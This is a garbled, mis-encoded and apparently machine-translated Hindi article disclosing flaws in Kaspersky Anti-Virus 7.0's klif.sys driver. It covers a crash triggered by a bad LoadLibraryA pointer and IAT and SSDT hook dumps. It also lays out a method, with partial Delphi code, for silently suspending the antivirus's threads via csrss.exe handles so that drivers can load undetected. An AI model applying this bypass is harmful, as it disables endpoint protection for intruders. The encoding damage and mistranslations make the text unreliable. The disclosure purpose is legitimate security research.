Arg3: f9417eee, рдпрджрд┐ рдЧреИрд░-рд╢реВрдиреНрдп, рдЕрдиреБрджреЗрд╢ рдкрддрд╛ рдЬреЛ рдЦрд░рд╛рдм рдореЗрдореЛрд░реА рдХреЛ рд╕рдВрджрд░реНрднрд┐рдд рдХрд░рддрд╛ рд╣реИ
рдкрддрд╛ред
Arg4: 00000001, (рдЖрд░рдХреНрд╖рд┐рдд)
рдбрд┐рдмрдЧрд┐рдВрдЧ рд╡рд┐рд╡рд░рдг:
- рд╡рд┐рд╢реНрд▓реЗрд╖рдг: рдЕрдЬреНрдЮрд╛рдд рдЖрдХрд╛рд░ рдХреЗ рд╕рд╛рде рдХрд░реНрдиреЗрд▓ред рдЬреНрдЮрд╛рдд рдЖрдХрд╛рд░ рдХреЗ рд╕рд╛рде рдкреНрд░рддреАрдХреЛрдВ рдХреЛ рдкреБрдирдГ рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрд╛рдзреНрдп рдХрд░реЗрдЧрд╛ред
рд╡рд┐рд╢реНрд▓реЗрд╖рдг: рдмрд▓ рдкреБрдирдГ рд▓реЛрдб рдХрдорд╛рди: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** рдХрд░реНрдиреЗрд▓ рдкреНрд░рддреАрдХ рдЧрд▓рдд рд╣реИрдВред рдХреГрдкрдпрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рддреАрдХреЛрдВ рдХреЛ рдареАрдХ рдХрд░реЗрдВред
MODULE_NAME: klif
рд╕рднреА bsod рдкрд╛рда ...
рдЗрд╕ рднрд╛рдЧ рдХреЗ рд▓рд┐рдП рд╕рд┐рдлрд╛рд░рд┐рд╢реЗрдВ рд╕рд░рд▓ рд╣реИрдВ - рдЕрдкрдиреЗ рдбреНрд░рд╛рдЗрд╡рд░ рдХреЛ рдбрд┐рдмрдЧрд░ рдХреЗ рдиреАрдЪреЗ рдЪрд▓рд╛рдПрдВред
рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреЛрдб
рд╡рд░
рдкреА 1: рдкреАрдЪрд░;
рд╢реБрд░реВ рдХрд░рдирд╛
p1: = рдкреАрдЪрд░ ($ ffffffff);
LoadLibraryA (p1);
рдЕрдВрдд;
Acces Violation рдХреА рдУрд░ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдпрд╣ рд╕рд╛рдорд╛рдиреНрдп рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╣рдордиреЗ рдлрд╝рдВрдХреНрд╢рди рдХреЗ рд▓рд┐рдП рдПрдХ рдЧрд▓рдд рдкреИрд░рд╛рдореАрдЯрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЬреЛ рд╕рд╛рдорд╛рдиреНрдп
рдирд╣реАрдВ рд╣реИ рд╡рд╣ рд╣реИ рдЬрд╣рд╛рдВ Acess Violation рд╣реЛрддрд╛ рд╣реИ, рдкрддреЗ рдкрд░ - 0xF80B3306ред
рдпрд╣ рдХреЛрдИ рдордЬрд╛рдХ рдирд╣реАрдВ рд╣реИ - 0xF80B3306ред рдХреЛрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдореЗрдВ! рдФрд░ рдЕрдзрд┐рдХ рд╕рдЯреАрдХ рд╣реЛрдиреЗ рдХреЗ рд▓рд┐рдП - klif.sys рдореЗрдВред
рджреЗрдЦрддреЗ рд╣реИрдВ рдХреНрдпрд╛ рд╣реЛрддрд╛ рд╣реИред
рд╣рдордиреЗ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдкреНрд░рддреНрдпреЗрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП IAT (
1 ,
2 ) рдХрд╛ рдПрдХ рдордЬрдмреВрдд рд╕рдВрд╢реЛрдзрди рдкрд╛рдпрд╛ред рджреЗрдЦреЗрдВ рдХрд┐ explorer.exe рдХреЗ рд╕рд╛рде рдХреНрдпрд╛ рд╣реЛрддрд╛ рд╣реИ
[420] explorer.exe -> kernel32.dll -> LoadLibraryExA, рдкреНрд░рдХрд╛рд░: рдкрддреЗ рдкрд░ IAT рд╕рдВрд╢реЛрдзрди 0x010010A8 -> 7C882FB0 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░ рдЬреЛ [рдХрд░реНрдиреЗрд▓ 32.dll] рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИред
[420] explorer.exe -> kernel32.dll -> LoadLibraryExW, рдкреНрд░рдХрд╛рд░: рдкрддреЗ рдкрд░ IAT рд╕рдВрд╢реЛрдзрди 0x010010F8 -> 7C882FD8 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░ рдЬреЛ [рдХрд░реНрдиреЗрд▓32.dll рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИ]
[420] explorer.exe -> kernel32.dll -> LoadLibraryA, рдкреНрд░рдХрд╛рд░: рдкрддреЗ рдкрд░ IAT рд╕рдВрд╢реЛрдзрди 0x01001150 -> 7C882F9C рд╣реБрдХ рд╣реИрдВрдбрд▓рд░ рдЬреЛ [рдХрд░реНрдиреЗрд▓32.dll] рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИред
[420] explorer.exe -> kernel32.dll -> LoadLibraryW, рдкреНрд░рдХрд╛рд░: рдкрддреЗ рдкрд░ IAT рд╕рдВрд╢реЛрдзрди 0x010011D0 -> 88C882FC4 рд╣реБрдХ рд╣реИрдВрдбрд▓рд░ рдЬреЛ [рдХрд░реНрдиреЗрд▓ рейреирежреж рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИ]
[420] explorer.exe -> kernel32.dll -> GetProcAddress, рдкреНрд░рдХрд╛рд░: рдкрддреЗ рдкрд░ IAT рд╕рдВрд╢реЛрдзрди 0x010011E4 -> 7C882FEC рд╣реБрдХ рд╣реИрдВрдбрд▓рд░ рдЬреЛ [рдХрд░реНрдиреЗрд▓ 32.dll] рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИред
рдЕрдЬреАрдм рд╣реИ, рд╣реИ рдирд╛? рдЪрд▓реЛ рдХреЙрд▓ рдХреЛ LoadLibraryA рдкрд░ рдЯреНрд░реИрдХ рдХрд░рддреЗ рд╣реИрдВред
KERNEL32.LoadLibraryA:
рдзрдХреНрдХрд╛рдореБрдХреНрдХреА
рдореВрд╡ рдПрдмрдк, рдПрд╕реНрдк
nop
рдкреЙрдк рдИрдмреЗ
jmp + $ 7b830b4a // - klif.sys рдкрд░ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
рдпрд╣ рд╣реИ рдХрд┐ рдХреНрдпрд╛ LoadLibraryA K рдХрд░реНрдиреЗрд╕реНрдХреА рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рджреНрд╡рд╛рд░рд╛ IAT рдХреЛ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд┐рдП рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж рдХрд░реНрдиреЗрд▓ 32.dll рдХреЗ рдЕрдВрджрд░ рджрд┐рдЦрддрд╛ рд╣реИред рдХреНрдпрд╛ рдпрд╣ рд╡рд┐рдХреГрддрд┐ рдирд╣реАрдВ рд╣реИ?
рдпрджрд┐ рдЖрдк рдЗрд╕ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХреЛ рдЕрдкрдиреЗ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдЖрдк (рдпрд╣ рдХреИрд╕реА рд╡рд┐рдбрдВрдмрдирд╛ рд╣реИ!) рдЗрд╕реЗ рдЕрддрд┐рд░рд┐рдХреНрдд рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рдЦреЛрд▓реЗрдВ рдФрд░ Kaspersky рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдХреЗ рд▓рд┐рдП рдзрдиреНрдпрд╡рд╛рдж рдмрдирд╛рдпрд╛! рд╣рдБрд╕реА, рдФрд░ рдХреБрдЫ рдирд╣реАрдВред
рдЗрд╕ рднрд╛рдЧ рдореЗрдВ, рд╣рдо рдЕрдиреБрд╢рдВрд╕рд╛ рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдХреИрд╕рдкрд░реНрд╕рдХреА рдбреЗрд╡рд▓рдкрд░реНрд╕ рдЕрдкрдиреЗ рдЙрддреНрдкрд╛рдж рд╕реЗ рд╡рд┐рдХреГрддрд┐рдпреЛрдВ рдХреЛ рд╣рдЯрд╛ рджреЗрдВред рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдХрд░реНрдиреЗрд▓ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рд╕рд╛рде рд╕рдВрд╡рд╛рдж рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмреЗрд╣рддрд░ рдФрд░ рд╕рд░рд▓ рддрд░реАрдХреЗ рд╣реИрдВ, рдФрд░ рджреВрд╕рд░реА рдмрд╛рдд, рдпрд╣ рд╕рд┐рд░реНрдл рдПрдХ рд╡рд┐рдХреГрддрд┐ рд╣реИред
рдХреИрд╕рдкрд░реНрд╕рдХреА рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдФрд░ рдЖрддреНрдорд░рдХреНрд╖рд╛рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рдореЗрдВ рд╕реЗ рдЕрдзрд┐рдХрд╛рдВрд╢ рдЬрд╛рдирддреЗ рд╣реИрдВ, рдХреИрд╕рдкрд░реНрд╕рдХреА рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рд╕рдХреНрд░рд┐рдп рд░реВрдк рд╕реЗ рд╣рдорд▓реЛрдВ рд╕реЗ рдмрдЪрд╛рддрд╛ рд╣реИред рдЗрд╕рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдБ рдЕрдирдзрд┐рдХреГрдд рдкрд╣реБрдБрдЪ рдФрд░ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рджреНрд╡рд╛рд░рд╛ рд╡рд┐рдирд╛рд╢ рд╕реЗ рд╕реБрд░рдХреНрд╖рд┐рдд рд╣реИрдВред рд▓реЗрдХрд┐рди рд╕рд╡рд╛рд▓ рдпрд╣ рд╣реИ рдХрд┐ рд╡реЗ рдХрд┐рддрдиреА рдЕрдЪреНрдЫреА рддрд░рд╣ рд╕реЗ рд╕рдВрд░рдХреНрд╖рд┐рдд рд╣реИрдВ?
рдЙрддреНрддрд░: рдмреАрдПрдбреАред
Kaspersky SSDT (рдпрд╛рдиреА NtOpenProcess, NtOpenThread, NtTerminateProcess, рдЖрджрд┐) рдФрд░ рд╢реИрдбреЛ SSDT (NtUserFindWowow, NtUserBuildHwndListList рдЖрджрд┐) рдореЗрдВ рдХрдИ рд╣реБрдХ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рддрд╛ рд╣реИ рддрд╛рдХрд┐ рдЖрдЧреЗ рдХреЗ рд╣рдорд▓реЛрдВ рд╕реЗ рдЦреБрдж рдХреЛ рдмрдЪрд╛рдпрд╛ рдЬрд╛ рд╕рдХреЗред
рдЕрдВрдд рдореЗрдВ, рдпрд╣ рд╕реНрд╡рдпрдВ рдХреЛ рдкреБрдирд░рд╛рд░рдВрдн рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЗ рд╕рд╛рде рдПрдХ рд╕реЗрд╡рд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рддрд╛ рд╣реИ рдЬрдм рдХреЛрдИ рддреНрд░реБрдЯрд┐ рд╣реЛрддреА рд╣реИред рдПрд╕рдПрд╕рдбреАрдЯреА рдореЗрдВ рдХрдИ рд╣реБрдХ рджреНрд╡рд╛рд░рд╛ рд╕реЗрд╡рд╛ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЛ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рд╕рдВрд░рдХреНрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рддреЛ рд╣рдо рдЗрд╕ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХреЛ рдХреИрд╕реЗ рдорд╛рд░ рд╕рдХрддреЗ рд╣реИрдВ? рдФрд░ рдХреНрдпрд╛ рд╣рдореЗрдВ рдЙрд╕реЗ рдорд╛рд░рдиреЗ рдХреА рдЬрд░реВрд░рдд рд╣реИ? рдпрджрд┐ рд╣рдо avp.exe рдХреЗ рджреГрд╢реНрдп рднрд╛рдЧ рдХреЛ рдорд╛рд░рддреЗ рд╣реИрдВ, рддреЛ рдЗрд╕реЗ рд╕реЗрд╡рд╛ рджреНрд╡рд╛рд░рд╛ рдлрд┐рд░ рд╕реЗ рд╢реБрд░реВ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рдпрджрд┐ рд╣рдо рд╕реЗрд╡рд╛ рдХреЛ рдорд╛рд░рддреЗ рд╣реИрдВ, рддреЛ рдЗрд╕реЗ рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рдмрдВрдзрдХ (SCM) рджреНрд╡рд╛рд░рд╛ рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рддреЛ рд╣рдо рдЗрд╕ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдХреЛ рдХреИрд╕реЗ рдирд╖реНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рд╢реИрдХреНрд╖рд┐рдХ рдЙрджреНрджреЗрд╢реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП, рдирд┐рд╢реНрдЪрд┐рдд рд░реВрдк рд╕реЗ)? рд╕рд╡рд╛рд▓ рдЕрдЪреНрдЫрд╛ рд╣реИред
рдЙрддреНрддрд░ рд╕рд░рд▓ рд╣реИ - рдбреНрд░рд╛рдЗрд╡рд░ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ, рдЙрд╕рдХреЗ рдмрд╛рдж рд╣рдо рдХреЗрдПрд╡реА рдХреЗ рд╣рд┐рдд рдХреЗ рдХреНрд╖реЗрддреНрд░ рд╕реЗ рдмрд╛рд╣рд░ рд╣реЛ рдЬрд╛рдПрдВрдЧреЗред рд▓реЗрдХрд┐рди рдкрд╣рд▓реЗ, рд╣рдореЗрдВ рдЗрд╕ рдЕрд╡рд╕рд░ рдХреЛ рдкрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕реЗ рд╕реНрдердЧрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рд╣реИ рдирд╛? рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдирд╣реАрдВред рдХрдо рд╕реЗ рдХрдо рддреАрди рд╡рд┐рдзрд┐рдпрд╛рдВ рд╣реИрдВ рдЬрд┐рдирдХреЗ рджреНрд╡рд╛рд░рд╛ рдЖрдк рдХреИрд╕рдкрд░реНрд╕рдХреА рдкреНрд░реЛрдПрдХреНрдЯрд┐рд╡ рдбрд┐рдлреЗрдВрд╕ 7.0 рд╕реЗ рдереЛрдбрд╝реА рд╕реА рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХреЗ рдмрд┐рдирд╛ рдбреНрд░рд╛рдЗрд╡рд░ рдХреЛ рдЪреБрдкрдЪрд╛рдк рдбрд╛рдЙрдирд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдФрд░ рдореБрдЭреЗ рдпрдХреАрди рд╣реИ рдХрд┐ рдЕрднреА рднреА рддрд░реАрдХреЗ рд╣реИрдВред рд╣рдорд╛рд░реЗ рдорд╛рдорд▓реЗ рдореЗрдВ, рд╣рдо рдмрд╕ рдХреИрд╕рдкрд░реНрд╕рдХреА рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рд╕рднреА рдереНрд░реЗрдбреНрд╕ рдХреЛ рдирд┐рд▓рдВрдмрд┐рдд рдХрд░ рджреЗрддреЗ рд╣реИрдВ; рдмрд╕ рд░реБрдХреЗрдВ, рдЬреНрдпрд╛рджрд╛ рдХреБрдЫ рдирд╣реАрдВ - рдмрд╕ рдЗрддрдирд╛ рд╣реА рдХрд╛рдлреА рд╣реИред
рд╣рдо рд╕реАрдзреЗ Kaspersky рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ, рдХреНрдпреЛрдВрдХрд┐ SSDT рдХрд╛ рдорд╛рд▓рд┐рдХ
PDM рд╣реИ ред рддреЛ рдпрд╣ "рдкрд╕рдВрджреАрджрд╛" рдкрд┐рдЫрд▓реЗ рджрд░рд╡рд╛рдЬреЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рд╕рдордп рд╣реИ рдЬрд┐рд╕реЗ
csrss.exe рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ :)
рдЗрд╕ рдЙрджрд╛рд╣рд░рдг рдореЗрдВ, рд╣рдо рдПрдХ рдкреНрд░рд╛рдердорд┐рдХрддрд╛ рдорд╛рдирддреЗ рд╣реИрдВ рдХрд┐ KAV рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХрд╛ рдирд╛рдо avp.exe рд╣реИ рдФрд░ csrss.exe рдПрдХ рдЙрджрд╛рд╣рд░рдг рдореЗрдВ рдореМрдЬреВрдж рд╣реИ (LOL, рд╣рд╛рдБ, рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рд░рд┐рдВрдЧ 3 рдкрд░ рдЪрд▓рдиреЗ рд╡рд╛рд▓рд╛ рдореИрд▓рд╡реЗрдпрд░ рд╣реИ рдФрд░ csrss.exe рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рдЪреНрдЫрдиреНрди рд╣реИ, рддреЛ рдЗрд╕ рдХреЛрдб рдХреЗ рд╕рд╛рде рдХреБрдЫ рд╕рдорд╕реНрдпрд╛рдПрдВ рд╣реЛрдВрдЧреАред )ред
...
pBuffer.dwSize: = sizeof (PROCESSENTRY32W);
SnapShotHandle: = CreateToolHelp32SnapShot (TH32CS_SNAPPROCESS, 0);
...
рдЕрдЧрд░ (ZwOpenProcess (@ph, PROCESS_ALL_ACCESS, @attr, @ cid1) <> STATUS_SUCCESS) рддреЛ рдмрд╛рд╣рд░ рдирд┐рдХрд▓реЗрдВ;
...
ZwAllocateVirtualMemory (GetCurrentProcess (), buf , 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation (SystemHandleInformation, buf, 4194304, @bytesIO);
рд╕рднреА рдХрд╛рд░реНрдпрдХреНрд░рдо рдкрд╛рда ...
рдЙрд╕рдХреЗ рдмрд╛рдж, рджреЛрдиреЛрдВ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдХрд╛рд╕реНрдкрд░рд╕реНрдХреА рдореЙрдбреНрдпреВрд▓ рдирд┐рд▓рдВрдмрд┐рдд рд╣реЛ рдЬрд╛рдПрдВрдЧреЗ рдФрд░ рд╣рдо рдбреНрд░рд╛рдЗрд╡рд░реЛрдВ рдХреЛ рд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЕрдкрдирд╛ рдХрд╛рдо рдЪреБрдкрдЪрд╛рдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ =)
KIS v7.0 рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЗ рд╕рд╛рде 125 рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдХрд░рддрд╛ рд╣реИред
Windws XP SP2, рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░ред
рд╣рдо рдЕрдиреБрд╢рдВрд╕рд╛ рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛ HANDLE_TABLE рдкрд░ рдЬрд╛рдП рдФрд░ рдЕрдкрдиреА рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЗ рд╕рдВрдЪрд╛рд▓рдХреЛрдВ рдХреЗ рд▓рд┐рдП рдкрд╣реБрдБрдЪ рдЕрдзрд┐рдХрд╛рд░ рдмрджрд▓реЗред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛ рдпрд╣ NtDuplicateObject рдкрд░ рд╣реБрдХ рдХреЛ рд╕реБрдзрд╛рд░рдиреЗ рдХрд╛ рд╕рдордп рд╣реИред
рдЙрдкрд╕рдВрд╣рд╛рд░рдЖрдк рд╢рд╛рдпрдж рдЦреБрдж рд╕реЗ рдкреВрдЫ рд░рд╣реЗ рд╣реИрдВ рдХрд┐ рдЗрд╕ рддрд░рд╣ рдХреА рд╕реНрдкрд╖реНрдЯ рддреНрд░реБрдЯрд┐рдпрд╛рдВ - рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рд╕рдмрд╕реЗ рд▓реЛрдХрдкреНрд░рд┐рдп рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдореЗрдВ рд╕реЗ рдПрдХ рдореЗрдВ рдЕрднреА рднреА рдХреНрдпреЛрдВ рдореМрдЬреВрдж рд╣реИрдВ? рд╣рд╛рдВ, рдХреНрдпреЛрдВрдХрд┐ рдХрд┐рд╕реА рдХреЛ рдХреИрд╕реНрдкрд░рд╕реНрдХреА рд▓реИрдм рдХреЗ рдЧрдзреЗ рдХреЗ рддрд╣рдд рдПрдХ рдЕрдЪреНрдЫреА рдиреМрдХрд░реА рджреЗрдиреА рдЪрд╛рд╣рд┐рдПред
рдмрд╣реБрдд рдкрд╣рд▓реЗ рдирд╣реАрдВ, рд╣рдордиреЗ рдХреЗрдПрд╡реА рддреНрд░реБрдЯрд┐рдпреЛрдВ рдХреА рдПрдХ рдФрд░ рд╕рдореАрдХреНрд╖рд╛ рдкреНрд░рдХрд╛рд╢рд┐рдд рдХреАред рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЕрдкреЗрдХреНрд╖рд┐рдд рдереАред рдЙрдиреНрд╣реЛрдВрдиреЗ рдХрд╣рд╛, "рдЪрд┐рдВрддрд╛ рдордд рдХрд░реЛ, рдпреЗ рдорд╣рддреНрд╡рдкреВрд░реНрдг рддреНрд░реБрдЯрд┐рдпрд╛рдБ рдирд╣реАрдВ рд╣реИрдВред" рдареАрдХ рд╣реИ, рд╣рд╛рдБ, рд╢рд╛рдпрдж
рдЕрддрд┐рдерд┐ рдЦрд╛рддреЗ рдХреЗ рддрд╣рдд рдореМрдд рдХреА рдмреНрд▓реВ рд╕реНрдХреНрд░реАрди рдХрдВрдкрдиреА рдХреЗ рд▓рд┐рдП рдЗрддрдиреА рдмрдбрд╝реА рд╕рдорд╕реНрдпрд╛ рдирд╣реАрдВ рд╣реИред "рд╕рдЪ рдореЗрдВред рд╕рд╛рдорд╛рдиреНрдп рддреМрд░ рдкрд░ рдмреАрдПрд╕рдУрдбреА рдХреЗ рд▓рд┐рдП рдЪреЗ? рдмрдХрд╡рд╛рд╕, рдЖрд░рд╛рдо рдХрд░реЛ рд▓реЛрдЧ ":) рд▓реЗрдХрд┐рди рдХреБрдЫ рдмрджрд▓ рд░рд╣рд╛ рд╣реИ - рдЙрдиреНрд╣реЛрдВрдиреЗ рдХрдИ рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЛ рдмрдВрдж рдХрд░ рджрд┐рдпрд╛, рдЗрд╕рд▓рд┐рдП рд╣рдореЗрдВ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рдереЛрдбрд╝рд╛ рдзрдиреНрдпрд╡рд╛рдж рдХрд╣рдирд╛ рдЪрд╛рд╣рд┐рдПред рдЗрд╕рдХреЗ рдмрдЬрд╛рдп, рд╣рдореЗрдВ $ @% $ & # рдХрд╛ рдПрдХ рдЧреБрдЪреНрдЫрд╛ рдорд┐рд▓рддрд╛ рд╣реИ! рдЖрдкрдХреЗ рдкрддреЗ рдкрд░ (рдЕрдиреМрдкрдЪрд╛рд░рд┐рдХ рд░реВрдк рд╕реЗ, рдирд┐рд╢реНрдЪрд┐рдд рд░реВрдк рд╕реЗ)ред рдЦреИрд░, рд╣рдо рд╕рд┐рд░реНрдл рдЗрд╕ рддрд░рд╣ рдХреА рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЪрд┐рдВрддрд╛ рдирд╣реАрдВ рдХрд░рддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЕрдкрдиреЗ рдЖрдк рдХреЛ (рдХрдЯреНрдЯрд░рдкрдВрдерд┐рдпреЛрдВ) рд▓реЛрдЧреЛрдВ рдХреЛ рдкрд░реЗрд╢рд╛рди рди рдХрд░реЗрдВред рд╣рдо рдЖрддреНрдо-рдкреНрд░рдЪрд╛рд░ рдирд╣реАрдВ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдФрд░ рдХреИрд╕рдкрд░реНрд╕рдХреА рд╕реЗ рдмреЗрд╡рдХреВрдл рдмреАрдПрд╕рдУрдбреА рдирд╣реАрдВ рджреЗрдЦрдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред
рдкреНрд░рд┐рдп рдХрд╛рд╕реНрдкрд░рд╕реНрдХреА рд▓реИрдм рдбреЗрд╡рд▓рдкрд░реНрд╕, рдЖрдкрдХрд╛ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдмрд╣реБрдд рдЕрдЪреНрдЫрд╛ рд╣реИ, рдЗрд╕рдореЗрдВ рдХреЛрдИ рд╕рдВрджреЗрд╣ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рд╢рд╛рдпрдж рдЗрди рдмрдЧреЛрдВ рдХреЛ рдареАрдХ рдХрд░рдиреЗ рдХрд╛ рд╕рдордп рд╣реИ? SSDT / IAT рд╕реЗ рд╡рд┐рдХреГрддрд┐рдпрд╛рдВ рджреВрд░ рдХрд░реЗрдВред рдЕрдкрдиреЗ рдбреНрд░рд╛рдЗрд╡рд░ рдореЗрдВ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╕реНрдерд┐рддрд┐рдпреЛрдВ рдХреЛ рдЕрдзрд┐рдХ рд╕рд╛рд╡рдзрд╛рдиреА рд╕реЗ рд╕рдВрднрд╛рд▓реЗрдВред рдЧрдВрднреАрд░рддрд╛ рд╕реЗ рдирд╣реАрдВ, рд▓реЗрдХрд┐рди рдХреНрдпрд╛ рдЧрд▓рдд рд╣реИ? Klif.sys рдХреЛ рджреЗрдЦрддреЗ рд╣реБрдП, рдореИрдВ рдХреЗрд╡рд▓ рдПрдХ рдЪреАрдЬ рджреЗрдЦрддрд╛ рд╣реВрдВ - рдПрдХ
рдмрдбрд╝рд╛, рдЫреЛрдЯреА рдЧрд╛рдбрд╝реА рдЪрд╛рд▓рдХред
рд╡реИрд╕реЗ, рдХрд┐рд╕реА рддрд░рд╣ рд╕реЗ рдЖрдк рдЗрд╕ рдЕрджреНрднреБрдд рд▓реЗрдЦ рдореЗрдВ klif.sys рдХреА рд╣рдорд╛рд░реА рдкрд┐рдЫрд▓реА рд╕рдореАрдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рдХрд╛рд╕реНрдкрд░рд╕реНрдХреА рд▓реИрдм рд╕реЗ рдЕрдиреМрдкрдЪрд╛рд░рд┐рдХ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдкрдврд╝ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ рдХреБрдЫ рдмреЗрддреБрдХреЗ рдмрдпрд╛рди рдФрд░ рдЕрд░реНрдерд╣реАрди рдЯрд┐рдкреНрдкрдгрд┐рдпрд╛рдВ рд╣реИрдВред рдХреБрдЫ рд╢рдмреНрджреЛрдВ рдореЗрдВ: рдЗрд╕ рд▓реЗрдЦ рдХреЗ рд▓реЗрдЦрдХ рдиреЗ рдЖрдВрд╢рд┐рдХ рд░реВрдк рд╕реЗ рдЕрдкрдиреЗ рдкреБрд░рд╛рдиреЗ рдФрд░ рдирдП рдЙрддреНрдкрд╛рджреЛрдВ рдореЗрдВ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрд░рдиреЗ рдХрд╛ рдЖрд░реЛрдк рд▓рдЧрд╛рдпрд╛ред
